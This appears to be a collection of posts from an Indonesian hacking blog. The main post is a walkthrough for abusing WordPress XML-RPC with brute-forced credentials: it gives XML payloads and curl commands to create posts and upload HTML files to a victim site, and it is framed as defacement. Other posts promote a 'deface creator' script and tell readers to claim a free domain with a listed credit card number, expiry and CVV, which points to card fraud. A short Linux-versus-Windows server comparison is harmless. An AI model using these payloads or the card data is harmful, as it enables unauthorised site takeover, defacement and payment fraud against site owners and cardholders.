Thursday 27 May 2021

Exploiting XML-RPC API pada WordPress

 



Vulnerability pada XMLRPC / tahap setelah BruteForce / alternatif jika gagal login ke /wp-admin/ (403/404/500)


  1.  Add Post (Menambahkan Postingan)

Menambahkan Postingan Baru Dengan POST XMLRPC:

Buka terminal linux (kali/ubuntu/termux/dll..)

Masukan command: nano addpost.xml

Lalu isikan dengan exploit berikut: 


<?xml version="1.0"?> <methodCall>

<methodName>wp.newPost</methodName> <params>

        <param><value>parameter</value></param>

        <param><value>vulnuser</value></param>

        <param><value>vulnuserpassword</value></param>

        <param><struct>

                <member><name>post_title</name><value>Exploit To Add Post with XML-RPC</value></member>

                <member><name>post_content</name><value>Seems Like The Site Was Vulnerable!</value></member>

                <member><name>post_excerpt</name><value>excerpt</value></member>

        </struct></param> </params>

 Saatnya mengexploit!

Masukan command: 

curl http://vulnsite.com/xmlrpc.php --data @addpost.xml

Jika sukses akan tampil seperti ini:


Angka 6 adalah id postnya

Cara melihat postingannya dengan menambahkan ?p=idpostingan 

Contoh: http://vulnsite.com/?p=6


Post Sukses Dibuat.


  1.  Add Media/File (Menambahkan Media/File)


Menambahkan Media atau File Baru Dengan POST XMLRPC:

Buka terminal linux (kali/ubuntu/termux/dll..)

Masukan command: nano addfile.xml

Lalu isikan dengan exploit berikut: 


<?xml version="1.0"?> <methodCall>

<methodName>metaWeblog.newMediaObject</methodName> <params>

        <param><value>parameter</value></param>

        <param><value>vulnuser</value></param>

        <param><value>vulnuserpassword</value></param>

        <param><struct>

                <member><name>name</name><value>touched.html</value></member>

                <member><name>type</name><value>text/plain</value></member>

                <member><name>bits</name><value>

                <![CDATA[<h1><center>File Uploaded Success<br/>XML-RPC add file exploit</center></h1>]]>

</value></member>

        </struct></param> </params>

</methodCall>


Exploit!

Masukan command: 

curl http://vulnsite.com/xmlrpc.php --data @addfile.xml

Jika sukses akan tampil seperti ini:


File sukses disimpan sesuai dengan nama yg telah ditentukan, di sini saya namakan filenya touched.html

Cara melihat hasil file yg tersimpan:

http://vulnsite.com/wp-content/uploads/2021(tahun saat upload)/05(bulan saat upload/namafile.html

Mari kita cek!:


File sukses terupload!


Cara mencegah exploit ini adalah dengan menginstall plugin bernama "Disable XML-RPC" lalu aktifkan, dan xmlrpc akan aman.


Sekian dari saya, semoga berguna dan bermanfaat!



Tuesday 5 June 2018

Script Deface Creator


Hai Bro bro! Nah di post ini ane mau share nih Script Deface Creator Dan ini 100% Codingan ane sendiri gan jadi maaf ya kalo tampilan dan hasilnya jelek:v namanya juga usaha wkwk:v yaudah deh gausah lama nih langsung aja comot gan

[ KLIK DISINI BOSSKU ]

Monday 14 May 2018

Cara Mendapatkan Domain .xyz GRATIS!


*KALO MAU COPAS IZIN DULU ATAU KASIH LINK SUMBER

Yoooo gimana kabarnya gaes?:v Semoga sehat:v
kali ini admin bakal share nih gimana cara dapatin domain xyz gratis... yo langsung aja ke tutorialnya


Pertama agan buka link ini:

KLIK DISINI BOSSQ


Lu klik Start NOW

Nah nanti agan masukin nama domain yg agan mau.. klik search jika available langsung saja klik ADD TO CART

Lihat Gambar ini


Sudah terlihat disitu harganya 0:v tapi ettss jangan kira agan bisa langsung dapetin gitu aja:v
ikutin tutorial ini sampe akhir.. karena tutorial ini bakal sangat detail sampe agan paham dan ngerti:v

Jika agan sudah memilih domain apa dan sudah klik ADD TO CART agan langsung saja klik CHECKOUT NOW 

lalu agan daftar terlebih dahulu setelah klik checkout

nah nanti akan ada halaman yang meminta credit card.. isi saja pakai ini:

Credit Card : 5365955250341834
Expire Date : 06/21
CVV : 937

Seperti ini..

jika sudah agan klik SAVE 

Nanti ada halaman PICK YOUR DOMAIN agan klik saja CONTINUE



Setelah itu agan isi data data yang diminta jika sudah Klik SETUP

Dan Klik Control Panel Seperti yang di Gambar Berikut


SELAMAT KAMU BERHASIL MENDAPATKAN DOMAIN .XYZ SECARA GRATIS:v



Nih hasil admin

https://www.spiderghost.xyz

http://www.idiotblackhat.xyz

Mungkin segitu aja dari admin:v mohon maaf kalo kurang jelas:v


Copyright 2018 SpiderGhost

Wednesday 9 May 2018

Perbedaan Linux Server Dengan Windows Server

LINUX SERVER

Linux adalah sistem operasi yang opensource yaitu sistem operasi yang bisa di gunakan oleh siapa aja dengan gratis tanpa biaya. Linux sendiri adalah raja di dunia webhosting, kenapa? karna linux ini mudah di gunakan dan gratis jadi banyak orang atau hoster hoster yang menggunakan linux di banding windows server Keunggulan linux :


Linux opensource gratis bisa digunakan oleh siapa saja dibanding dengan windows server yang relatif lebih mahalLinux sendiri didukung oleh banyak bahasa pemrograman web yaitu : PHP, Ruby ob Rails, Perl, Phyton dan masih banyak lagi yang bisa di gunakan oleh linux.
Meskipun linux mempunya banyak kelebihan, tentu saja linux juga mempunya beberapa kekurangan yaitu : salah satunya yang cukup vital adalah linux kurang atau tidak mendukung bahasa pemrograman web ASP dan .NET

WINDOWS SERVER

Windows hosting ini ada lah webserver yang dimana dia menggunakan lisensi berbayar untuk di instal di server nya. windows server sejati nya sangat berbeda dengan windows di pc. kelebihan dari windows server ialah di sangat mendukung bahasa ASP dan .NET

Kekurangan Windows Server :


Windows server tidak sepopuler dengan windows server sehingga belum mempunyai layanan yang begitu banyakHarga windows server lebih mahal di bandingkan dengan harga server yang menggunakan linux yang opensource
Kalau di bilang mana yang lebih cocok masing masing mempunya kriteria dalam berdunia website jadi mana yang lebih cocok menggunakan windows hosting dan mana yang lebih cocok menggunakan linux


oke cukup artikel perbedaan linux server dengan windows server semoga bermanfaat bagi kalian